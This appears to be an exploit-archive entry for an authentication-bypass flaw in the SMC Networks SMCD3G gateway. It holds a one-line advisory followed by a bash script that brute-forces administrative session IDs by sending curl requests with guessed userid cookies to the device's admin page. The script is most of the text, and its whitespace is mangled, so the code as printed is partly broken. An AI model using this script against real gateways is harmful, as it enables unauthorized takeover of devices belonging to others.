source: https://www.securityfocus.com/bid/46178/info
The SMC Networks SMCD3G gateway is prone to a remote authentication-bypass vulnerability.
An attacker can exploit this issue to gain unauthorized administrative access to the affected devices.#!/bin/bashstart=1267604160
end=1267605960
for(( i=$start; i<=$end; i++))doif[ `curl -sb userid=$i
http://10.1.10.1/admin/index.asp | grep -c login.asp` -lt"1"] then echo"Session ID Found:$i"
fi
if[ $(($i% 100))-eq"0"]
then echo"Currently at $i"
fi
done